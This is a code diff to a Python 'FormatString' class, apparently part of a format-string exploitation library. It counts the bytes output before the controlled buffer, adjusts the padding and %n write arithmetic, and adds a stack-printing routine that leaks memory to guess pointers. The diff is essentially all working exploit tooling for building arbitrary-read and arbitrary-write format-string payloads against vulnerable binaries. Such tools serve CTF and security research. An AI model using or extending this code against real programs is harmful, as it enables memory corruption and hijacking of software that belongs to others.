@@ -65,6 +65,7 @@ class FormatString:
         # Where is our controlled buffer?
         self.pad = None
         self.index = None
+        self.alreadyWritten = None
 
         # Recording what's already on the stack
         self.stack = [0]
@@ -87,8 +88,73 @@ class FormatString:
         # explore the stack
         self._exploreStack()
 
+    def _intToStr(self,i):
+        """Converts integer to it's corresponding ASCII string representation"""
+        
+        # Change to hex
+        s = hex(i)[2:]
+
+        # Add padding if needed
+        if len(s) % 2 == 1:
+            s = "0" + s
+
+        # Unhexlify it
+        s = unhexlify(s)
+
+        # Reverse the order if we're little endian
+        if self.endian == 'little':
+            s = s[::-1]
+
+        return s
+
+
+    def _isPrintableString(self,s):
+        """Check if the string we're given should be considered printable."""
+        return min(map(lambda x: x in string.printable,s))
+
+
+    def printStack(self,guessPointers=True):
+        """Print out what we know about the stack layout in a table format. Note: guessPointers may cause the binary to crash if it is guessed incorrectly."""
+        
+        columns = ["Index","Value","Guess"]
+
+        table = PrettyTable(columns)
+        table.align['Guess'] = 'l'
+
+        # Create some statistics for heuristics and pointer guessing
+        stats = {key:len(list(group)) for key,group in groupby(sorted([hex(addr)[2:5] for addr in self.stack if addr > 0x1000 and not self._isPrintableString(self._intToStr(addr))]))}
+
+        # Loop through the stack items creating table
+        for i in range(1,len(self.stack)):
+            val = self.stack[i]
+            guess = []
+
+            # If the data in here is printable
+            if self._isPrintableString(self._intToStr(val)):
+                guess.append(repr(self._intToStr(val)))
+
+            # If we have elf tools and this appears to be a known address
+            if self.elf and val in self.elf.symbols.values():
+                guess.append("Symbol: " + [sym for sym in self.elf.symbols if self.elf.symbols[sym] == val][0])
+
+            # If we think this might be a pointer
+            if guessPointers and hex(val)[2:5] in stats and stats[hex(val)[2:5]] > 2:
+                
+                guess.append("Pointer --> " + repr(self.leak.s(val))[:64])
+
+            # Add it to our table
+            table.add_row([
+                i,
+                hex(val),
+                ', '.join(guess)
+            ])
+
+        print(table)
+
+
+    """
     def printStack(self):
-        """Print out what we know of the stack layout in a table format."""
+        ""Print out what we know of the stack layout in a table format.""
         columns = ["Index","Value","Guess"]
         table = PrettyTable(columns)
         
@@ -121,7 +187,7 @@ class FormatString:
             ])
 
         print(table)
-            
+    """     
 
     def _exploreStack(self):
         """Explore what pointers and data already exists on the stack."""
@@ -178,9 +244,14 @@ class FormatString:
 
             # Check for pad offset
             for pad in range(wordSize):
+
                 output = self.exec_fmt("{2}{0}%{3}$0{1}{4}".format(testInput,wordSize*2,padChar * pad,index,outType))
                 outputHex = output.split(testInput)[1][:wordSize*2] # grab the hex
 
+                # If this is the base print, lets find the number of bytes written before us
+                if index == 1 and pad == 0:
+                    self.alreadyWritten = len(output.split(testInput)[0])
+
                 # Check if we found it
                 if unhexlify(outputHex)[::-1] == testInput:
                     discovered = True
@@ -402,11 +473,11 @@ class FormatString:
             return None
 
         # Print out appropriate number of chars
-        fmt = "J"*self.pad
-        if val - self.pad > 0:
-            fmt += "%{0}c".format(str(val-self.pad))
+        fmt = ""
+        if val - self.pad - self.alreadyWritten > 0:
+            fmt += "%{0}c".format(str(val-self.pad-self.alreadyWritten))
         
-        elif val - self.pad < 0:
+        elif val - self.pad - self.alreadyWritten < 0:
             log.error("Pad value is larger than print value. Pick a larger value to write.")
             return None
 
@@ -426,10 +497,11 @@ class FormatString:
 
         fmt = fmt.format(str(index_updated).rjust(3,"0"))
 
-        fmt = "{0}{1}{2}".format(
+        fmt = "{3}{0}{1}{2}".format(
             fmt,
             "J"*pad_after,
-            self._packPointer(addr)
+            self._packPointer(addr),
+            "J"*self.pad
             )
 
         self.exec_fmt(fmt)
@@ -505,6 +577,7 @@ class FormatString:
 
         # TODO: Assuming pad of 0. Need to implement heuristic to guess a better pad.
         pad = self.pad or 0
+        alreadyWritten = self.alreadyWritten or 0
 
         # TODO: This is kinda #YOLO... Need to better handle the case where we're going into the blind from the get go..
         index = self.index or 1
@@ -529,11 +602,10 @@ class FormatString:
         # Sort writes by value increasing
         writes = sorted(writes,key=lambda x: x['val'])
 
-        # Add any initial pad
-        fmt = "J"*pad
+        fmt = ""
 
         # For each value we need to write, add it on to the format string
-        cumulative = 0
+        cumulative = alreadyWritten + pad
 
         for write in writes:
 
@@ -573,6 +645,9 @@ class FormatString:
                 fmt_format.append(str(index_updated).rjust(3,"0"))
                 index_updated += 1
 
+        # Add in padding
+        fmt = "J"*pad + fmt
+
         # Now add in our indexes
         fmt = fmt.format(*fmt_format)
 
@@ -714,3 +789,4 @@ from binascii import unhexlify
 from struct import pack, unpack
 from prettytable import PrettyTable
 import string
+from itertools import groupby
